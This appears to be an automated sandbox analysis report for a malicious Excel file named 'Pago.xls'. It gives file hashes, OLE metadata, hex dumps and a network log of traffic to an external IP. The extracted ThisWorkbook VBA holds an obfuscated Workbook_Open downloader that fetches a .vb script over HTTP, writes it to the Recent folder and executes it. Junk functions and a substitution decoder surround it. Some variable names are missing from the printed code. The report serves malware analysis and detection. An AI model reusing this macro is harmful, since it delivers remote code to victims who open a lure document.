                                              File name:Pago.xls
                                              File size:56'832 bytes
                                              MD5:fcf8455b5da351650ed2e3c7d560d76e
                                              SHA1:e8e8b2be3a8c6bcf4a875671c468eb1dae630111
                                              SHA256:f945161c3ba134c15554ef6dab1300ce6991e341d83bae157117072660533364
                                              SHA512:7497d7297e6434d73008635ffe80fb6dfdd7b660d62c78bb7b7ceb31e0e008374a190928a1860471cb4c090666dd3ac59dfb2b48730a875c1a95f74e58fc3cd8
                                              SSDEEP:1536:5VxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAxPdoK+E:5VxEtjPOtioVjDGUU1qfDlaGGx+cL2Q/
                                              TLSH:6343F6517681C8DADA5803354DE2C6DA7B23FC51AE5B43CB3248B32F6EB16E0CC93606
                                              Icon Hash:276ea3a6a6b7bfbf
                                              Document Type:OLE
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Code Page:1252
                                              Author:admin
                                              Last Saved By:oplup
                                              Create Time:2018-12-06 20:43:11
                                              Last Saved Time:2024-12-14 09:17:33
                                              Creating Application:Microsoft Excel
                                              Security:0
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                              VBA File Name:Module1.bas
                                              Stream Size:960
                                              Attribute VB_Name = "Module1"
                                              Sub book()
                                              '
                                              End Sub
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Attribute VB_Name = "Sheet1"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Attribute VB_Name = "Sheet2"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name: Sheet3.cls
                                              Stream Size: 977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a C . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 40 61 43 05 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name: ThisWorkbook.cls
                                              Stream Size: 6651
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ a 3 . . # . . . . . . . . . . . . . . . . . @ . . . # . H N E n B . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . { . 3 4 S C M + . . . . . . . . . . . . . . . . . . . . . . x . . . . { . 3 4 S C M + # . H N E n B . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0
                                              Data Raw:01 16 01 00 03 00 01 00 00 8c 07 00 00 e4 00 00 00 10 02 00 00 ba 07 00 00 c8 07 00 00 80 10 00 00 00 00 00 00 01 00 00 00 40 61 33 80 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 23 a0 e8 1e ea 8c 48 4e 84 b8 45 ba fd 6e a1 42 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              Private Sub Workbook_Open()
                                              Dim WshShell As Object
                                              Dim JUvyuihkbSpecialPathKBJKfgh As String
                                              Dim  As Integer
                                               = Chr(50) + Chr(48) + Chr(48)
                                                
                                              
                                                  Set WshShell = CreateObject("WScript.Shell")
                                                  JUvyuihkbSpecialPathKBJKfgh = WshShell.SpecialFolders("Recent")
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim 
                                              Dim  As Integer
                                              Dim 
                                              Dim 
                                               = 1
                                              
                                              
                                              
                                              
                                              Set  = CreateObject("microsoft.xmlhttp")
                                              Set  = CreateObject("Shell.Application")
                                              
                                               = JUvyuihkbSpecialPathKBJKfgh + ("\VMV.vb")
                                              .Open "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
                                              .send
                                               = .responseBody
                                              If .Status = 200 Then
                                              Set  = CreateObject("adodb.stream")
                                              .Open
                                              .Type = 
                                              .Write 
                                              .SaveToFile ,  + 
                                              .Close
                                              End If
                                              .Open ()
                                              End Sub
                                              
                                              Function xghxfcBropn() As Byte
                                              xghxfcBropn = 111
                                              Call xdfzfgxdb
                                              Function xdfzfgxdb() As Boolean
                                              xdfzfgxdb = False
                                              Call Zoorroom
                                              Function Zoorroom() As Double
                                              Zoorroom = Zoorroom
                                              Call hormmmom
                                              Function hormmmom() As Variant
                                              hormmmom = timong
                                              Function timong() As Long
                                              timong = fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh
                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh As Byte
                                              fdyhjdfyfghjfhygyjfyjdfjfgyjfgjfgtujxftgh = 100
                                              Call fthdsthdfAxgfhhd
                                              Function fthdsthdfAxgfhhd()
                                              fthdsthdfAxgfhhd
                                              End Function
                                              
                                              
                                                  Public Function ()
                                                       = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                                                       = " @#$%^&*()_+|01456789bdghjklmqvwz.,-~AFGHJKMNQRTVWXZ?!23acefinoprstuxyBCDEILOPSUY"
                                                      For w = 1 To Len()
                                                           = InStr(, Mid(, w, 1))
                                                          If  > 0 Then
                                                               = Mid(, , 1)
                                                               =  + 
                                                          Else
                                                               =  + Mid(, w, 1)
                                                          End If
                                                      Next
                                                       = 
                                                  End Function
                                              

                                              General
                                              Stream Path: \x1CompObj
                                              CLSID:
                                              File Type: data
                                              Stream Size: 107
                                              Entropy: 4.184829500435969
                                              Base64 Encoded: True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path: \x5DocumentSummaryInformation
                                              CLSID:
                                              File Type: data
                                              Stream Size: 244
                                              Entropy: 2.9042242012830974
                                              Base64 Encoded: False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path: \x5SummaryInformation
                                              CLSID:
                                              File Type: data
                                              Stream Size: 208
                                              Entropy: 3.535237808505323
                                              Base64 Encoded: False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a d m i n . . . . . . . . . . . o p l u p . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 4 M . @ . . . t . . N . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00
                                              General
                                              Stream Path: Workbook
                                              CLSID:
                                              File Type: Applesoft BASIC program data, first line number 16
                                              Stream Size: 30661
                                              Entropy: 6.498992807596208
                                              Base64 Encoded: True
                                              Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . \\ . p . . . . o p l u p B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . Z . S C : 8 . . . . . . . X . @ . . . . . . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 6f 70 6c 75 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type: ASCII text, with CRLF line terminators
                                              Stream Size: 567
                                              Entropy: 5.269308213158805
                                              Base64 Encoded: True
                                              Data ASCII:I D = " { C 4 5 3 5 6 A 2 - 9 9 0 B - 4 0 8 6 - 8 8 E 3 - 9 9 E 6 0 8 9 7 A 9 8 B } " . . M o d u l e = M o d u l e 1 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4
                                              Data Raw:49 44 3d 22 7b 43 34 35 33 35 36 41 32 2d 39 39 30 42 2d 34 30 38 36 2d 38 38 45 33 2d 39 39 45 36 30 38 39 37 41 39 38 42 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type: data
                                              Stream Size: 128
                                              Entropy: 3.225887155982128
                                              Base64 Encoded: False
                                              Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type: data
                                              Stream Size: 4686
                                              Entropy: 5.460951643302122
                                              Base64 Encoded: False
                                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0
                                              CLSID:
                                              File Type: data
                                              Stream Size: 1648
                                              Entropy: 4.486854279522573
                                              Base64 Encoded: False
                                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ S $ G . l U ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:93 4b 2a 94 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1
                                              CLSID:
                                              File Type: data
                                              Stream Size: 213
                                              Entropy: 4.135793655107541
                                              Base64 Encoded: False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . i . . . . . . . . . . . . . . . . . . . S . . . Z . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 29 03 00 00 00 00 00 00 69 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 15 00 00 08 53 00 00 00 a6 ba bf a8 b8 ab
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2
                                              CLSID:
                                              File Type: data
                                              Stream Size: 84
                                              Entropy: 1.9112050925821995
                                              Base64 Encoded: False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3
                                              CLSID:
                                              File Type: data
                                              Stream Size: 104
                                              Entropy: 1.8791610310005664
                                              Base64 Encoded: False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . n . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4
                                              CLSID:
                                              File Type: data
                                              Stream Size: 508
                                              Entropy: 2.284485644632113
                                              Base64 Encoded: False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . + . 8 . . . i . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 f1 05 00 00 00 00 00 00 19 06 00 00 00 00 00 00 41 06 00 00 00 00 00 00 ff ff ff ff c9 05 00 00 00 00 00 00 08 00 2b 00 38 00 00 00 69 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 91 06
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5
                                              CLSID:
                                              File Type: data
                                              Stream Size: 422
                                              Entropy: 2.6944113916031895
                                              Base64 Encoded: False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . 0 . . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . % . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . # . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . + . ( . . . . . . . . . . . . ` . . ! . . . . . . . . . . . / . ( . A . . . . . . . . . . ` . . % . . . . . . . . . . . ( . ( . . . . . . . . . . . ` . . ) . . . . . . . . . . . / . 0 . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 04 00 00 00 03 60 00 00 30 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 00 28 00 41 01 00 00 00 00 04 00 01 00 03 60 04 01 15 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00
                                              General
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type: data
                                              Stream Size: 613
                                              Entropy: 6.408833595804487
                                              Base64 Encoded: True
                                              Data ASCII:. a . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . q p i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                              Data Raw:01 61 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 71 99 70 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                              Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                              Dec 14, 2024 13:51:52.035856009 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:52.035917997 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:52.035974026 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:52.042916059 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:52.042937994 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:53.843456984 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:53.843662024 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:53.849812031 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:53.849831104 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:53.850416899 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:53.850474119 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:53.924396992 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:53.967341900 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.335606098 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.335654974 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.335686922 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.335745096 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.335799932 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.335799932 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.335799932 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.337136030 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.340190887 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.340204000 CET  443          49161      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:54.340209961 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:54.340339899 CET  49161        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:55.834732056 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:55.834795952 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:55.834861994 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:55.836162090 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:55.836174965 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.191937923 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.192003965 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.196748018 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.196758986 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.197108984 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.275952101 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.319344044 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.893975973 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894020081 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894028902 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894045115 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894052029 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894054890 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894547939 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.894597054 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.894618034 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.894659996 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.894720078 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.943953037 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.943969011 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.943994045 CET  443          49162      87.121.86.205  192.168.2.22
                                              Dec 14, 2024 13:51:57.944032907 CET  49162        443        192.168.2.22   87.121.86.205
                                              Dec 14, 2024 13:51:57.944072008 CET  443          49162      87.121.86.205  192.168.2.22
